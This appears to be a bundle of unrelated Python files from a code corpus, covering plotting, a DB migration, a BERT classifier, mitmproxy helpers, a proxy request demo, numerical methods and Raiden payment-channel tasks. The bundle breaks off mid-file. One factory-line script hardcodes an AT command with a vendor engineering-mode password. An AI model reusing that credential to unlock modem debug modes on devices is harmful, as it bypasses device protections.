+{"seq_id":"230965538","text":"import matplotlib.pyplot as plt \n\nemp_ages = [22,45,30,59,58,56,57,45,43,43,50,40,34,33,25,19] \nbins = [0,10,20,30,40,50,60] \n\nplt.hist(emp_ages, bins, histtype='bar', rwidth=0.8, color='cyan') \n\nplt.xlabel('employee ages') \nplt.ylabel('no. of employees') \nplt.title('ORACLE CORP') \n\nplt.legend() \nplt.show()\n","sub_path":"PY10/Histogram.py","file_name":"Histogram.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"122095433","text":"\"\"\"Add last failed login date\n\nRevision ID: e9fd4b35dee9\nRevises: 19aba10b42ed\nCreate Date: 2020-02-02 15:20:19.576515\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e9fd4b35dee9'\ndown_revision = '19aba10b42ed'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('users', sa.Column('last_failed_login', sa.DateTime(), nullable=False, server_default='2000-01-01 00:00:00'))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('users', 'last_failed_login')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/e9fd4b35dee9_add_last_failed_login_date.py","file_name":"e9fd4b35dee9_add_last_failed_login_date.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"625588968","text":"import factoryStation\nimport operations.sendATCommand\n\n\nclass unlockEngMode(operations.sendATCommand.sendATCommand):\n '''Unlock engineering mode'''\n\n def __init__(self,factoryStation, options):\n self.name = 'unlockEngMode'\n self.description = unlockEngMode.__doc__\n self.ATcmd = 'AT%IPWD=\"iceraempwd\",0'\n super(unlockEngMode,self).__init__(factoryStation, options)\n\n# ------------------------------------------------- \n# Testing \n# -------------------------------------------------\nif __name__ == \"__main__\":\n\n testMode = True\n \n fs = factoryStation.factoryStation(None, testMode) # default factoryStation object\n options = {'ATtool' : 'atcmd-itf'}\n fo = unlockEngMode( fs, options )\n fo.postResult( fo.do() )\n","sub_path":"ManuFacturingLine/operations/unlockEngMode.py","file_name":"unlockEngMode.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"74724379","text":"from pycm import *\nimport nltk\nnltk.download('punkt')\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom collections import Counter\nimport pickle\nimport sys\nfrom glob import glob \nimport math\nimport shutil\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nimport torchvision \nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data.dataset\nimport torch.utils.data.dataloader\nimport torchvision.transforms as visionTransforms\nimport PIL.Image as Image\nfrom torchvision.transforms import ToTensor,ToPILImage\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nimport os\nimport io\nimport csv\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\ndfTrain = pd.read_csv(\"/root/combined.csv\", index_col=None)\ndfTest=pd.read_csv(\"/root/test.csv\",escapechar = \"\\\\\",quoting = csv.QUOTE_NONE)\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\n\nlabelEncoder=preprocessing.LabelEncoder()\nencodedLabelListTrain=(labelEncoder.fit_transform(dfTrain[\"Label\"]))\ndfTrain[\"Label\"]=encodedLabelListTrain\n\nfrom torch.utils.data import WeightedRandomSampler\nfreqLabels=torch.tensor(dfTrain['Label'].value_counts().sort_index(),dtype=torch.double)\nweightClass=freqLabels/freqLabels.sum()\nweightClass= 1/weightClass\nweightClass=(weightClass).tolist()\nsampleWeights=[weightClass[i] for i in dfTrain['Label']]\ntrainSampler=WeightedRandomSampler(sampleWeights,len(dfTrain))\n\nfrom transformers import BertTokenizer, AutoTokenizer, BertModel, AutoModel\nfrom torch.utils.data import Dataset, DataLoader\n\nclass QuoraDataset(Dataset):\n\n def __init__(self,dataframe,bertTokenizer,maxLength,device):\n self.data=dataframe\n self.bertTokenizer=bertTokenizer\n self.maxLength=maxLength\n \n def __len__(self):\n return len(self.data)\n\n def __getitem__(self,idx):\n #print(idx)\n self.productDescription=str(self.data.loc[idx,\"Text\"])\n self.label=self.data.loc[idx,\"Label\"]\n\n self.encodedInput=self.bertTokenizer.encode_plus(text=self.productDescription,padding='max_length',truncation=\"longest_first\",max_length=self.maxLength,return_tensors='pt',return_attention_mask=True,return_token_type_ids=True).to(device)\n \n return self.encodedInput,self.label\n\nclass FlipkartTestDataset(Dataset):\n\n def __init__(self,dataframe,bertTokenizer,maxLength,device):\n self.data=dataframe\n self.bertTokenizer=bertTokenizer\n self.maxLength=maxLength\n \n def __len__(self):\n return len(self.data)\n\n def __getitem__(self,idx):\n self.productDescription=str(self.data.iloc[idx,1])+str(self.data.iloc[idx,2])+str(self.data.iloc[idx,3])\n\n self.encodedInput=self.bertTokenizer.encode_plus(text=self.productDescription,padding='max_length',truncation=\"longest_first\",max_length=self.maxLength,return_tensors='pt',return_attention_mask=True,return_token_type_ids=True).to(device)\n \n return self.encodedInput\n\ntokenizer = AutoTokenizer.from_pretrained('distilbert-base-uncased')\nquoraTrainDataset=QuoraDataset(dataframe=dfTrain,bertTokenizer=tokenizer,maxLength=128,device=device)\nflipkartTestDataset=FlipkartTestDataset(dataframe=dfTest,bertTokenizer=tokenizer,maxLength=128,device=device)\ntrainLoader=torch.utils.data.DataLoader(quoraTrainDataset,batch_size=8,sampler=trainSampler)\ntestLoader=torch.utils.data.DataLoader(flipkartTestDataset,batch_size=8,shuffle=False)\n\nclass BERTOnly(nn.Module):\n def __init__(self,preTrainedBert,embeddingDimension=768,numClasses=1):\n super(BERTOnly,self).__init__()\n\n self.embDim=embeddingDimension\n self.numClasses=numClasses\n\n self.dropoutLayer=nn.Dropout(p=0.5)\n self.bert=self.freezeBert(preTrainedBert)\n self.fc1=nn.Linear(self.embDim,9919)\n\n def forward(self,input):\n bertOutput=self.bert(input_ids=input['input_ids'].squeeze(dim=1),attention_mask=input['attention_mask'].squeeze(dim=1)).last_hidden_state[:, 0, :]\n #print(bertOutput.shape)\n classificationOutput=self.fc1(self.dropoutLayer(bertOutput))\n #print(classificationOutput.shape)\n #classificationOutput=classificationOutput.reshape((classificationOutput.size(0)))\n #print(classificationOutput.shape)\n return classificationOutput\n\n def freezeBert(self,model):\n return model\n\nmodel = AutoModel.from_pretrained(\"distilbert-base-uncased\")\nbertOnly=BERTOnly(preTrainedBert=model)\nbertOnly.to(device)\nsoftmaxLoss = nn.CrossEntropyLoss()\noptimizer = optim.Adam(bertOnly.parameters(), lr=0.00001)\n\ndef Average(lst): \n return sum(lst) / len(lst) \n\ndef train_model(model,epochs):\n\n trainBatchCount=0\n testBatchCount=0\n\n avgTrainAcc=[]\n avgValidAcc=[]\n trainAcc=[]\n validAcc=[]\n trainLosses=[]\n validLosses=[]\n avgTrainLoss=[]\n avgValidLoss=[]\n\n\n for i in range(epochs):\n\n print(\"Epoch:\",i)\n\n model.train()\n print(\"Training.....\")\n for batch_idx,(data,targets) in enumerate(trainLoader):\n\n trainBatchCount=trainBatchCount+1\n\n targets=targets.to(device)\n\n optimizer.zero_grad()\n\n scores=model(data)\n \n loss=softmaxLoss(scores,targets)\n\n loss.backward()\n\n optimizer.step()\n\n trainLosses.append(float(loss))\n\n \n correct=0\n total=0\n total=len(targets)\n\n\n predictions=torch.argmax(scores,dim=1)\n correct = (predictions==targets).sum()\n acc=float((correct/float(total))*100)\n\n trainAcc.append(acc)\n\n if ((trainBatchCount%200)==0):\n\n print(\"Targets:-\",targets)\n print(\"Predictions:-\",predictions)\n\n print(\"Epoch:\",i)\n print(\"Batch:\",batch_idx)\n print('Loss: {} Accuracy: {} %'.format(loss.data, acc))\n\t\n\n #model.eval()\n #print(\"Validating.....\")\n #for data,targets in valLoader:\n\n #testBatchCount=testBatchCount+1\n\n #targets=targets.to(device=device)\n\n #scores=model(data)\n\n #loss=softmaxLoss(scores,targets)\n\n #validLosses.append(float(loss))\n\n #testCorrect=0\n #testTotal=0\n\n #_,predictions=scores.max(1)\n\n #testCorrect = (predictions==targets).sum()\n #testTotal=predictions.size(0)\n\n #testAcc=float((testCorrect/float(testTotal))*100)\n\n #validAcc.append(testAcc)\n\n #if ((testBatchCount%200)==0):\n\n #print('Loss: {} Accuracy: {} %'.format(float(loss), testAcc))\n \n\n trainLoss=Average(trainLosses)\n #validLoss=Average(validLosses)\n avgTrainLoss.append(trainLoss)\n #avgValidLoss.append(validLoss)\n tempTrainAcc=Average(trainAcc)\n #tempTestAcc=Average(validAcc)\n avgTrainAcc.append(tempTrainAcc)\n #avgValidAcc.append(tempTestAcc)\n\n print(\"Epoch Number:-\",i,\" \",\"Training Loss:-\",\" \",trainLoss,\"Training Acc:-\",\" \",tempTrainAcc)\n\n trainAcc=[]\n ValidAcc=[]\n trainLosses=[]\n validLosses=[]\n\n return model,avgTrainLoss,avgTrainAcc\n\nbertOnly,avgTrainLoss,avgTrainAcc = train_model(bertOnly,3)\n\n\ndef checkClassificationMetrics(loader,model):\n\n completeTargets=[]\n completePreds=[]\n\n correct=0\n total=0\n model.eval()\n\n with torch.no_grad():\n for data in loader:\n\n #targets=targets.to(device=device)\n\n scores=model(data)\n _,predictions=scores.max(1)\n\n #targets=targets.tolist()\n predictions=predictions.tolist()\n\n #completeTargets.append(targets)\n completePreds.append(predictions)\n\n #completeTargetsFlattened=[item for sublist in completeTargets for item in sublist]\n completePredsFlattened=[item for sublist in completePreds for item in sublist]\n\n #cm = ConfusionMatrix(actual_vector=completeTargetsFlattened, predict_vector=completePredsFlattened)\n return completePredsFlattened\n\nCM=checkClassificationMetrics(testLoader,bertOnly)\n\nfinalResult=labelEncoder.inverse_transform(CM)\npid=list(dfTest.iloc[:,0])\n\ntempdf=pd.DataFrame(list(zip(pid, finalResult)),\n columns =['PRODUCT_ID', 'BROWSE_NODE_ID'])\n\ntempdf.to_csv(\"Results1.csv\")\n\n","sub_path":"amazonML.py","file_name":"amazonML.py","file_ext":"py","file_size_in_byte":7889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"152309408","text":"from __future__ import absolute_import, print_function, division\n\nfrom mitmproxy import controller\nfrom netlib import wsgi\nfrom netlib import version\nfrom netlib.http import http1\n\n\nclass AppRegistry:\n def __init__(self):\n self.apps = {}\n\n def add(self, app, domain, port):\n \"\"\"\n Add a WSGI app to the registry, to be served for requests to the\n specified domain, on the specified port.\n \"\"\"\n self.apps[(domain, port)] = wsgi.WSGIAdaptor(\n app,\n domain,\n port,\n version.MITMPROXY\n )\n\n def get(self, request):\n \"\"\"\n Returns an WSGIAdaptor instance if request matches an app, or None.\n \"\"\"\n if (request.host, request.port) in self.apps:\n return self.apps[(request.host, request.port)]\n if \"host\" in request.headers:\n host = request.headers[\"host\"]\n return self.apps.get((host, request.port), None)\n\n\nclass StreamLargeBodies(object):\n def __init__(self, max_size):\n self.max_size = max_size\n\n def run(self, flow, is_request):\n r = flow.request if is_request else flow.response\n expected_size = http1.expected_http_body_size(\n flow.request, flow.response if not is_request else None\n )\n if not r.raw_content and not (0 <= expected_size <= self.max_size):\n # r.stream may already be a callable, which we want to preserve.\n r.stream = r.stream or True\n\n\nclass ClientPlaybackState:\n def __init__(self, flows, exit):\n self.flows, self.exit = flows, exit\n self.current = None\n self.testing = False # Disables actual replay for testing.\n\n def count(self):\n return len(self.flows)\n\n def done(self):\n if len(self.flows) == 0 and not self.current:\n return True\n return False\n\n def clear(self, flow):\n \"\"\"\n A request has returned in some way - if this is the one we're\n servicing, go to the next flow.\n \"\"\"\n if flow is self.current:\n self.current = None\n\n def tick(self, master):\n if self.flows and not self.current:\n self.current = self.flows.pop(0).copy()\n if not self.testing:\n master.replay_request(self.current)\n else:\n self.current.reply = controller.DummyReply()\n master.request(self.current)\n if self.current.response:\n master.response(self.current)\n","sub_path":"mitmproxy/flow/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"603043131","text":"class Job:\n def __init__(self,part):\n self.name=None\n self.dmg=None\n self.hp=None\n self.items=[\"Easter Egg\"]\n\n if part==\"warrior\":\n self.name=\"Warrior\"\n self.dmg=25\n self.hp=125\n self.items=[\"Sword\",\"Healing Potion\",\"Light Armor\"]\n\n if part==\"wizard\":\n self.name=\"Wizard\"\n self.dmg=10\n self.hp=75\n self.items=[\"Magic Wand\",\"Healing Potion\",\"Robes\"]\n\n if part==\"bard\":\n self.name=\"Bard\"\n self.dmg=10\n self.hp=50\n self.items=[\"Lute\",\"Healing Potion\",\"Robes\"]\n\n def __str__(self):\n I= \"--\"+self.name+\"-- \\n\"\n I+= \"Damage: \"+str(self.dmg)+\"\\n\"\n I+= \"Health: \"+str(self.hp)+\"\\n\"\n I+= \"Starting Items: \\n\"\n for item in self.items:\n I+= \"\\t\" + item + \"\\n\"\n return I\n","sub_path":"Job.py","file_name":"Job.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"515457071","text":"#!/usr/bin/env python\nfrom setuptools import setup, Extension\nfrom setuptools.command.build_ext import build_ext\n\nwith open('README.md') as f:\n long_description = f.read()\n\n\ndef get_version():\n return open('version.txt', 'r').read().strip()\n\n\nclass NumpyBuildExt(build_ext):\n \"\"\"build_ext command for use when numpy headers are needed.\"\"\"\n\n def run(self):\n\n # Import numpy here, only when headers are needed\n import numpy # noqa\n\n # Add numpy headers to include_dirs\n self.include_dirs.append(numpy.get_include())\n\n # Call original build_ext command\n build_ext.run(self)\n\n\nsetup(name='dativascrubber',\n version=get_version(),\n description='Dativa scrubber for automatic file cleansing',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url='https://bitbucket.org/dativa4data/scrubber/',\n author='Dativa',\n author_email='hello@dativa.com',\n license='MIT',\n zip_safe=False,\n packages=['dativa.analyzer',\n 'dativa.scrubber'],\n include_package_data=True,\n setup_requires=[\n 'setuptools>=38.6.0',\n 'wheel>=0.31.0',\n 'numpy>=1.13.3'],\n install_requires=['setuptools>=38.6.0',\n 'pandas==0.23.4',\n 'numpy>=1.13.3',\n 'python-levenshtein>=0.12.0',\n 'Cython>=0.27.3',\n 'pycryptodome>=3.7.2',\n 'dativatools>=2.9.16',],\n scripts=['bin/fanalyzer'],\n test_suite='nose.collector',\n tests_require=['nose', 'coverage'],\n cmdclass={'build_ext': NumpyBuildExt},\n ext_modules=[Extension(name=\"dativa.scrubber.distance\", sources=[\"dativa/scrubber/distance.pyx\"])],\n classifiers=['Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Libraries',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.6'],\n keywords='dativa, data cleansing, data pipeline'\n )\n","sub_path":"pypi_install_script/dativascrubber-1.1.89.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"516767683","text":"import urllib.request\n\ndef handler_openner():\n\n # 系统urlopen没有添加代理功能,需要自己添加\n url = \"http://www.baidu.com\"\n\n # 原始的请求源码里面本质是httphandler传入opener再openurl\n # urllib.request.urlopen()\n\n # 利用自己创建handler来发送请求 模板\n # handler = urllib.request.HTTPHandler()\n # opener = urllib.request.build_opener(handler)\n # response = opener.open(url)\n # data = response.read().decode(\"utf-8\")\n # print(data)\n\n # 使用代理ip来访问请求\n proxy = {\n \"https\": \"119.101.114.8:9999\"\n }\n proxy_handler = urllib.request.ProxyHandler(proxy)\n opener = urllib.request.build_opener(proxy_handler)\n try:\n response = opener.open(url)\n data = response.read().decode(\"utf-8\")\n print(data)\n except Exception as e:\n print(e)\n\n\nhandler_openner()\n","sub_path":"python_spider/day01/05-ip.py","file_name":"05-ip.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"148924195","text":"# encoding utf-8\nfrom utils import div_tuple, multi_tuple, add_many_tuples, add_two_tuples\nimport csv\n\n\ndef rk4(function, x0, x1, y0, n=1, varying=False, should_pop_limit=False):\n if isinstance(y0, tuple):\n return rk4_tuple(function, x0, x1, y0, n)\n else:\n return rk4_int(function, x0, x1, y0, n)\n\n\ndef rk4_tuple(function, x0, x1, y0, n):\n csv_file_prey = open('results_prey.csv', 'w')\n csv_file_predator = open('results_predator.csv', 'w')\n prey_writer = csv.writer(csv_file_prey)\n predator_writer = csv.writer(csv_file_predator)\n\n # Calcula o tamanho do passo em X dependendo do numero de intervalos\n h = (x1 - x0) / float(n)\n\n old_y = y0\n old_x = x0\n for i in range(1, n + 1):\n k1 = multi_tuple(h, function(old_x, old_y))\n k2 = multi_tuple(h, function(old_x + 0.5 * h,\n add_two_tuples(old_y,\n multi_tuple(0.5, k1))))\n k3 = multi_tuple(h, function(old_x + 0.5 * h,\n add_two_tuples(old_y,\n multi_tuple(0.5, k2))))\n k4 = multi_tuple(h, function(old_x + h,\n add_two_tuples(old_y, k3)))\n new_x = old_x + h\n new_y = add_two_tuples(old_y, div_tuple(6, add_many_tuples(\n k1 + k2 + k2 + k3 + k3 + k4)))\n\n old_y = new_y\n old_x = new_x\n prey_writer.writerow([new_x, old_y[0]])\n predator_writer.writerow([new_x, old_y[1]])\n\n csv_file_prey.close()\n csv_file_predator.close()\n\n return new_y\n\n\ndef rk4_int(function, x0, x1, y0, n):\n # Calcula o tamanho do passo em X dependendo do numero de intervalos\n h = (x1 - x0) / float(n)\n\n old_y = y0\n old_x = x0\n for i in range(1, n + 1):\n k1 = h * function(old_x, old_y)\n k2 = h * function(old_x + 0.5 * h, old_y + 0.5 * k1)\n k3 = h * function(old_x + 0.5 * h, old_y + 0.5 * k2)\n k4 = h * function(old_x + h, old_y + k3)\n new_x = old_x + h\n new_y = old_y + (k1 + k2 + k2 + k3 + k3 + k4) / 6\n old_y = new_y\n old_x = new_x\n\n return new_y\n","sub_path":"methods/rk4.py","file_name":"rk4.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"19258961","text":"# 反向迭代\nl = [1, 2, 3, 4, 5]\n# 得到反向迭代器,实际上是调用的是__reversed__方法\nprint(reversed(l))\nfor x in reversed(l):\n print(x)\n\n# 得到正向迭代器,实际上是调用的是__iter__方法\nprint(iter(l))\nfor x in iter(l):\n print(x)\n\n\nclass FloatRange(object):\n def __init__(self, start, end, step = 0.1):\n self.start = start\n self.end = end\n self.step = step\n\n def __iter__(self):\n t = self.start\n while t <= self.end:\n yield t\n t += self.step\n\n def __reversed__(self):\n t = self.end\n while t >= self.start:\n yield t\n t -= self.step\n\nfor x in reversed(FloatRange(1, 5, 0.5)):\n print(x)\n","sub_path":"第二章/3rd.py","file_name":"3rd.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"231869152","text":"from unittest.mock import patch\nfrom PyMieSim.Scatterer import Sphere\nfrom PyMieSim.Source import PlaneWave\nfrom PyMieSim.Detector import Photodiode, IntegratingSphere\n\n\n@patch(\"pyvista.Plotter.show\")\ndef test_sampling_100(patch):\n detector = Photodiode(NA=0.2, sampling=100, gamma_offset=0, phi_offset=0)\n\n figure = detector.plot().show()\n\n figure.close()\n\n\n@patch(\"pyvista.Plotter.show\")\ndef test_sampling_300(patch):\n detector = Photodiode(NA=0.7, sampling=300, gamma_offset=30, phi_offset=0)\n\n figure = detector.plot().show()\n\n figure.close()\n\n\n@patch(\"pyvista.Plotter.show\")\ndef test_integrating_sphere(patch):\n detector = IntegratingSphere(sampling=300)\n\n figure = detector.plot().show()\n\n figure.close()\n\n\n@patch(\"pyvista.Plotter.show\")\ndef test_coupling(patch):\n source = PlaneWave(wavelength=1e-6, polarization=0, amplitude=1)\n\n scatterer = Sphere(diameter=100e-9, source=source, index=1.4, n_medium=1.0)\n\n detector = IntegratingSphere(sampling=300)\n\n detector.Coupling(scatterer=scatterer)\n\n\n@patch(\"matplotlib.pyplot.show\")\ndef test_footprint(patch):\n source = PlaneWave(wavelength=1e-6, polarization=0, amplitude=1)\n\n scatterer = Sphere(diameter=100e-9, source=source, index=1.4, n_medium=1.0)\n\n detector = Photodiode(NA=0.7, sampling=30, gamma_offset=30, phi_offset=0)\n\n data = detector.get_footprint(scatterer=scatterer)\n\n figure = data.plot().show()\n\n figure.close()\n","sub_path":"tests/detectors/test_photodiode.py","file_name":"test_photodiode.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"197363609","text":"## Nana tv v 2.0\n#\n# Button config\n# 1 Pride and predudice\n# 2 Bride and predudice\n# 3 Andre Rieu\n# 4 random\n\nimport os\nimport random\nimport subprocess\nimport time\nimport RPi.GPIO as GPIO\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(4,GPIO.IN)\nGPIO.setup(17,GPIO.IN)\nGPIO.setup(27,GPIO.IN)\nGPIO.setup(22,GPIO.IN)\n\n# 10 second start to exit nanatv\nprint(\"starting nanaTV in 10 seconds\")\ntime.sleep(10)\nprint(\"starting nanaRV\")\n\n# Generate file list\nextensionList = [\".avi\"] # list of allowed media file extensions.\nmediaDir = '/home/pi/media/'\nfileList = []\nfor root, dirnames, filenames in os.walk(mediaDir):\n for filename in filenames:\n if any([filename.endswith(ext) for ext in extensionList]):\n fileList.append(os.path.join(root, filename))\n\nandreDir = '/home/pi/media/andre/'\nandreList = []\nfor root, dirnames, filenames in os.walk(andreDir):\n for filename in filenames:\n if any([filename.endswith(ext) for ext in extensionList]):\n andreList.append(os.path.join(root, filename))\n\nPrideFilm = '/home/pi/media/Pride_and_Prejudice.avi'\nBrideFilm = '/home/pi/media/Bride_and_Prejudice.avi'\n\ndef getpin():\n # get gpio pin and return\n if (GPIO.input(4)):\n pinno = 1\n elif (GPIO.input(17)):\n pinno = 2\n elif (GPIO.input(27)):\n pinno = 3\n elif (GPIO.input(22)):\n pinno = 4\n else:\n pinno = 0\n return pinno\n \ndef playdata(fileList,playtype):\n selectedFile = random.choice(fileList)\n p = subprocess.Popen([\"omxplayer\",\"-b\",\"-o\" \"hdmi\",selectedFile])\n while p.poll() is None:\n pinno = getpin()\n if pinno != 0: \n p.terminate()\n playtype = pinno\n break\n time.sleep(0.5)\n return playtype\n \n\nplaytype = 1\nwhile True:\n if playtype == 1:\n playdata(fileList,1)\n elif playtype == 2: \n playdata(andreDir,2)\n elif playtype == 3: \n playdata(PrideFilm,1)\n elif playtype == 4: \n playdata(BrideFilm,1) \n else:\n break\n ","sub_path":"nana_tv.py","file_name":"nana_tv.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"331958094","text":"# -*- coding: utf8 -*-\nimport logging\nimport random\nimport time\n\nimport gevent\nfrom gevent.event import AsyncResult\nfrom gevent.timeout import Timeout\n\nfrom ethereum import slogging\nfrom ethereum.utils import sha3\n\nfrom raiden.messages import (\n RefundTransfer,\n Secret,\n SecretRequest,\n TransferTimeout,\n)\nfrom raiden.utils import lpex, pex\n\n__all__ = (\n 'LogListenerTask',\n 'StartMediatedTransferTask',\n 'MediateTransferTask',\n 'EndMediatedTransferTask',\n)\n\nlog = slogging.get_logger(__name__) # pylint: disable=invalid-name\nREMOVE_CALLBACK = object()\nDEFAULT_EVENTS_POLL_TIMEOUT = 0.5\n\n\nclass Task(gevent.Greenlet):\n \"\"\" Base class used to created tasks.\n\n Note:\n Always call super().__init__().\n \"\"\"\n\n def __init__(self):\n super(Task, self).__init__()\n self.response_message = None\n\n def on_completion(self, success):\n self.transfermanager.on_task_completed(self, success)\n return success\n\n def on_response(self, msg):\n # we might have timed out before\n if self.response_message.ready():\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'ALREADY HAD EVENT %s %s now %s',\n self,\n self.response_message.get(),\n msg,\n )\n else:\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'RESPONSE MESSAGE RECEIVED %s %s %s',\n repr(self),\n id(self.response_message),\n msg,\n )\n\n self.response_message.set(msg)\n\n\nclass LogListenerTask(Task):\n \"\"\" Task for polling for filter changes. \"\"\"\n\n def __init__(self, listener_name, filter_, callback, contract_translator,\n events_poll_timeout=DEFAULT_EVENTS_POLL_TIMEOUT):\n \"\"\"\n Args:\n listener_name (str): A name to distinguish listener tasks.\n filter_ (raiden.network.rpc.client.Filter): A proxy for calling the\n blockchain's filter api.\n callback (function): A function to be called once an event happens.\n contract_translator (ethereum.abi.ContractTranslator): A contract\n translator to decode the event data.\n events_poll_timeout (float): How long the tasks should sleep before\n polling again.\n \"\"\"\n super(LogListenerTask, self).__init__()\n\n self.listener_name = listener_name\n self.filter_ = filter_\n self.callback = callback\n self.contract_translator = contract_translator\n\n self.stop_event = AsyncResult()\n self.sleep_time = events_poll_timeout\n\n # exposes the AsyncResult timer, this allows us to raise the timeout\n # inside this Task to force an update:\n #\n # task.kill(task.timeout)\n #\n self.timeout = None\n\n def __repr__(self):\n return ''.format(self.listener_name)\n\n def _run(self): # pylint: disable=method-hidden\n stop = None\n\n while stop is None:\n filter_changes = self.filter_.changes()\n\n for log_event in filter_changes:\n log.debug('New Events', task=self.listener_name)\n\n event = self.contract_translator.decode_event(\n log_event['topics'],\n log_event['data'],\n )\n\n if event is not None:\n originating_contract = log_event['address']\n\n try:\n self.callback(originating_contract, event)\n except:\n log.exception('unexpected exception on log listener')\n\n self.timeout = Timeout(self.sleep_time) # wait() will call cancel()\n stop = self.stop_event.wait(self.timeout)\n\n def stop(self):\n self.stop_event.set(True)\n\n\nclass AlarmTask(Task):\n \"\"\" Task to notify when a block is mined. \"\"\"\n\n def __init__(self, chain):\n super(AlarmTask, self).__init__()\n\n self.callbacks = list()\n self.stop_event = AsyncResult()\n self.wait_time = 0.5\n self.chain = chain\n self.last_block_number = self.chain.block_number()\n\n def register_callback(self, callback):\n \"\"\" Register a new callback.\n\n Note:\n This callback will be executed in the AlarmTask context and for\n this reason it should not block, otherwise we can miss block\n changes.\n \"\"\"\n if not callable(callback):\n raise ValueError('callback is not a callable')\n\n self.callbacks.append(callback)\n\n def _run(self): # pylint: disable=method-hidden\n stop = None\n result = None\n last_loop = time.time()\n log.debug('starting block number', block_number=self.last_block_number)\n\n while stop is None:\n current_block = self.chain.block_number()\n\n if current_block > self.last_block_number + 1:\n difference = current_block - self.last_block_number - 1\n log.error(\n 'alarm missed %s blocks',\n difference,\n )\n\n if current_block != self.last_block_number:\n self.last_block_number = current_block\n log.debug('new block', number=current_block, timestamp=last_loop)\n\n remove = list()\n for callback in self.callbacks:\n try:\n result = callback(current_block)\n except:\n log.exception('unexpected exception on alarm')\n else:\n if result is REMOVE_CALLBACK:\n remove.append(callback)\n\n for callback in remove:\n self.callbacks.remove(callback)\n\n # we want this task to iterate in the tick of `wait_time`, so take\n # into account how long we spent executing one tick.\n work_time = time.time() - last_loop\n if work_time > self.wait_time:\n log.warning(\n 'alarm loop is taking longer than the wait time',\n work_time=work_time,\n wait_time=self.wait_time,\n )\n sleep_time = 0.001\n else:\n sleep_time = self.wait_time - work_time\n\n stop = self.stop_event.wait(sleep_time)\n last_loop = time.time()\n\n def stop(self):\n self.stop_event.set(True)\n\n\nclass StartMediatedTransferTask(Task):\n def __init__(self, transfermanager, amount, target, done_result):\n super(StartMediatedTransferTask, self).__init__()\n self.amount = amount\n self.address = transfermanager.assetmanager.raiden.address\n self.target = target\n self.transfermanager = transfermanager\n self.done_result = done_result\n\n def __repr__(self):\n return '<{} {}>'.format(\n self.__class__.__name__,\n pex(self.address),\n )\n\n def _run(self): # pylint: disable=method-hidden,too-many-locals\n amount = self.amount\n target = self.target\n raiden = self.transfermanager.assetmanager.raiden\n\n fee = 0\n # there are no guarantees that the next_hop will follow the same route\n routes = self.transfermanager.assetmanager.get_best_routes(\n amount,\n target,\n lock_timeout=None,\n )\n\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'START MEDIATED TRANSFER initiator:%s target:%s',\n pex(self.address),\n pex(self.target),\n )\n\n for path, forward_channel in routes:\n # try a new secret\n secret = sha3(hex(random.getrandbits(256)))\n hashlock = sha3(secret)\n\n next_hop = path[1]\n\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'START MEDIATED TRANSFER NEW PATH path:%s hashlock:%s',\n lpex(path),\n pex(hashlock),\n )\n\n self.transfermanager.register_task_for_hashlock(self, hashlock)\n\n lock_expiration = (\n raiden.chain.block_number() +\n forward_channel.settle_timeout -\n raiden.config['reveal_timeout']\n )\n\n mediated_transfer = forward_channel.create_mediatedtransfer(\n raiden.address,\n target,\n fee,\n amount,\n lock_expiration,\n hashlock,\n )\n raiden.sign(mediated_transfer)\n forward_channel.register_transfer(mediated_transfer)\n\n response = self.send_and_wait_valid(raiden, path, mediated_transfer)\n\n # `next_hop` timedout\n if response is None:\n self.transfermanager.on_hashlock_result(hashlock, False)\n\n # someone down the line timedout / couldn't proceed\n elif isinstance(response, (RefundTransfer, TransferTimeout)):\n self.transfermanager.on_hashlock_result(hashlock, 